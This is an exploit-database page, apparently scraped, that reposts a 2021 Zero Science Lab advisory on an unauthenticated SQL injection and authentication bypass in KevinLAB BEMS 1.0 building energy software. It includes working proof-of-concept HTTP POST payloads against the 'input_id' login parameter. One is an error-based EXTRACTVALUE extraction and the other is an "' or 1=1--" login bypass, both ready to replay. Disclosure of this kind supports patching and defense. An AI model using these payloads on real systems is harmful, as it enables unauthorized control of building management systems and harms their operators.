Registerkevinlab bems 1.0 authentication bypass
▸▸▸ Exploit & Vulnerability >> webapps exploit & hardware vulnerability
Online Vulnerability Scanner Tools
Code...
# Exploit Title: KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass # Date: 05.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kevinlab.com Vendor: KevinLAB Inc. Product web page: http://www.kevinlab.com Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System) Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control. Desc: The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through 'input_id' POST parameter in '/http/index.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism. Tested on: Linux CentOS 7 Apache 2.4.6 Python 2.7.5 PHP 5.4.16 MariaDB 5.5.68 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5655 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php 05.07.2021 -- PoC POST data payload (extract): -------------------------------- POST /http/index.php HTTP/1.1 Host: 192.168.1.3 requester=login request=login params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}] PoC POST data payload (authbypass): ----------------------------------- POST /http/index.php HTTP/1.1 Host: 192.168.1.3 requester=login request=login params=[{"name":"input_id","value":"USERNAME' or 1=1--},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
Kevinlab bems 1.0 authentication bypass Vulnerability / Exploit Source : Kevinlab bems 1.0 authentication bypass
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes